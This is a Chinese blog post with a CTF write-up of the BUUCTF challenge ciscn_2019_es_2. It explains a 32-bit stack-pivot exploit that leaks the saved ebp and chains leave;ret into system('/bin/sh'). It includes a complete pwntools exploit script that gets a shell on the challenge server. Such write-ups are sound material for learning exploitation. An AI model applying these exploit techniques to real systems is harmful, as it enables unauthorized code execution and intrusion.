[PWN] 栈迁移 ciscn_2019_es_2

已于 2023-09-19 21:01:18 修改
阅读量303 收藏 2
点赞数 1
分类专栏: PWN 技巧 文章标签: linux python 系统安全
于 2022-11-28 09:32:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55700752/article/details/128073951
版权
PWN 同时被 3 个专栏收录
13 篇文章 0 订阅
订阅专栏
技巧
8 篇文章 0 订阅
订阅专栏
栈迁移
1 篇文章 0 订阅
订阅专栏

ciscn_2019_es_2

1.查看文件信息

checksec一下:32位程序,开启了RELOR和NX保护

image-20221127221136943

运行:发现是输入字符串的题目

image-20221127221244830

2.IDA分析

发现vul函数,s到ebp的长度为 0x28,但是可以读入0x30个字节,只有0x30 - 0x28 = 0x08个自己供我们利用,只能覆盖ebp和返回地址,

因此判断需要用到栈迁移的知识

image-20221127221500961

检查程序,发现hack函数,里面含有system函数,但是没有’/bin/sh’字符串

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KXcvZ9GF-1669599009341)(https://ldx-picture.oss-cn-hangzhou.aliyuncs.com/202211280815887.png)]

1.确定栈劫持地址与偏移

本题中,我们可将栈劫持到缓冲区变量s的位置,便可以继续写入我们的payload,因此要确定s的起始地址

需要提前泄露s的地址,

可以利用printf函数会一直打印到’\0’的机制,泄露ebp寄存器的内容,然后确定变量s到ebp的偏移,进而计算s的起始地址

先将断点下在vul函数的nop指令处

image-20221128083901143

执行,我们第二次输入"aaaabbbb"进行定位,ebp位于地址0xffffcf78处,该寄存器的内容为 0xffffcf88,即为上层main函数的ebp地址

此时esp的地址为0xffffcf50, 二者的偏移量为0x38

因此得出结论,我们只需要在printf泄露出ebp存储的地址后减去0x38就可以得到esp的地址,即栈劫持的目标地址

image-20221128084353026

2.ROPgadget查找可以利用的leave ret 地址

这里我们利用0x080484b8

image-20221128085817355

3.第一个payload

payload1 = b'A' * (0x27) + b'B'
p.send(payload1) # not sendline
p.recvuntil("B")
original_ebp = u32(p.recv(4))
print(hex(original_ebp))

当我们接收到’B’字符时,说明s变量的内容已被全部打印出来,接下来printf就应该打印ebp存储的地址,

即main函数的ebp,可以通过减去0x38得到变量s的起始地址

4.第二个payload

payload2 = b'aaaa' # for location, start of hijaction
payload2 += p32(system_addr)
payload2 += b'dddd' # fake stack ebp
payload2 += p32(original_ebp - 0x28) # addr of binsh
payload2 += b'/bin/sh\x00' # at ebp-0x28
payload2 = payload2.ljust(0x28, b'p')

payload2 += p32(original_ebp - 0x38) # hijack ebp ,-0x38 is the aaaa
payload2 += p32(leave_ret) # new leave ret

执行到栈迁移的最后一个 pop eip 时,此时eip应该为 esp + 4 ,即system_addr的地址

这里我们自己写入’/bin/sh’字符串,以作为system函数的参数

3.完整exp脚本

from pwn import *

p = remote("node4.buuoj.cn", 25235)

system_addr = 0x08048400
leave_ret = 0x080484b8

payload1 = b'A' * (0x27) + b'B'
p.send(payload1) # not sendline
p.recvuntil("B")
original_ebp = u32(p.recv(4))
print(hex(original_ebp))

payload2 = b'aaaa' # for location, start of hijaction
payload2 += p32(system_addr)
payload2 += b'dddd' # fake stack ebp
payload2 += p32(original_ebp - 0x28) # addr of binsh
payload2 += b'/bin/sh\x00' # at ebp-0x28
payload2 = payload2.ljust(0x28, b'p')

payload2 += p32(original_ebp - 0x38) # hijack ebp ,-0x38 is the aaaa
payload2 += p32(leave_ret) # new leave ret

p.sendline(payload2)
p.interactive()

成功得到shell

image-20221128092241515

看海就会失去海
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
【BUUCTFPWNciscn_2019_es_2 迁移 劫持
m0_55368674的博客
01-16 616
【BUUCTFPWNciscn_2019_es_2题解
BUUCTF迁移ciscn_2019_es_2
Rt1Text的博客
04-09 994
1.checksec+运行获取基本信息 32位+NX堆不可执行 2.常规IDA操作 1.main函数 并没有什么 2.int vul()函数 程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规溢出操作 但是shift+f12 这里仅仅是打印flag字符串,没有用 同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数 但是...
[CISCN 2019东北]PWN2题解
最新发布
XJQ100717的博客
04-20 797
要学习的看过来
ciscn_2019_es_2
z1r0的博客
12-08 198
ciscn_2019_es_2 查看保护 有溢出,但是溢出有限,所以可以考虑一下迁移迁移其实就是通过ebp和esp间接跳板来控制eip执行system即可。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 28028) else: r = pro
Linux PWN技巧之迁移
小小鱼的博客
02-16 1765
简介 迁移简单将就是控制EBP/RBP、ESP/RSP寄存器,让帧指向一段我们可以控制的内存,从而实现控制上执行内容、控制程序执行流程的目的。 迁移一般会将帧指向bss段(其他可读写内存段也可以),这种技巧是为了解决上空间太小,不够写入完整payload的情况。比如有个程序存在溢出的漏洞,但溢出的长度不够,只够覆盖到返回地址,不能读入完整的rop链,这种情况就可能要用到迁移的技巧了 利用介绍 以32位程序为例,描述一下迁移的核心思想。 首先要理解leave和ret汇编指令的作用: lea
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
ciscn_2021_game
06-23
2021年国赛的pwn题,虚拟机类型的题目,分析起来比较有难度。
迁移(leave ret)(更适合pwn宝宝体质的迁移~)
Kata_Jhin的博客
05-15 1554
更适合pwn入门新手体质的迁移教程
迁移基础
Civit_的博客
03-27 166
迁移就是控制E/RBP、E/RSP寄存器,让帧指向一段我们可以控制的内存,从而实现程序执行流的目的。​ 溢出攻击时,一个条件就是上有充分的空间可以布局。当溢出空间不够时,就需要迁移来解决了。
PWN——迁移
L2329794714的博客
08-29 1487
简单一句话就是控制esp指针的指向。实现指令:eave;ret 指令Leave等价于:其实就是在做恢复上一次空间的操作。但这过程中能恢复到上次的的关键数据为当前ebp指向地址上值(oldebp),当我们通过溢出覆盖原本的oldebp值时,然后将leave;ret 程序段地址放在返回地址上,那么就可以实现将esp迁移至我们想要的地方(取决于oldebp上的覆盖的地址,注意这里会抬高4字节,64位抬8字节)。第一次leave第一次ret:因为esp还是指向leave;.........
pwn刷题num43---迁移
tbsqigongzi的博客
05-03 643
BUUCTF-PWN-ciscn_2019_es_2 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在溢出 开启NX保护-----堆不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下伪代码 可以看到read函数读入0x30字节给s,可是s是0x28字节大小,只相差0x8字节,只能覆盖ebp和函数返回地址,而程序中无直接getshell的函数,程序
PWN题型之迁移
swedsn
07-30 1436
文章目录前言0x1 :基本知识:0x2 :利用思路 :0x3 :实例讲解 前言 0x1 :基本知识: (1)存在溢出,但是溢出的长度不够,你输入的内容最多只能覆盖掉ret返回地址,而之后的rop链无法构造。 (2)就是之前的.bas 0x2 :利用思路 : 0x3 :实例讲解 ...
迁移原理介绍与应用
weixin_39529207的博客
02-20 4805
本文将对CTF Pwn中「迁移」(又称「转移」)这一技术进行介绍与分析,希望读完本文后以下问题将不再困扰你: 什么是迁移迁移解决了什么问题? 怎么使用迁移这个技巧? 开始之前,有如下预备知识会极大提升你的阅读体验: CTF Pwn是在做什么?提权(Getshell)是什么意思? 在操作系统内存布局中,是一种怎样的结构,具有怎样的特点? x86中常用寄存器的名称与作用?函数调用的原理与过程是怎样的? 溢出攻击的核心技巧是什么? 溢出是怎么回事?  在预备知识的4个问
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值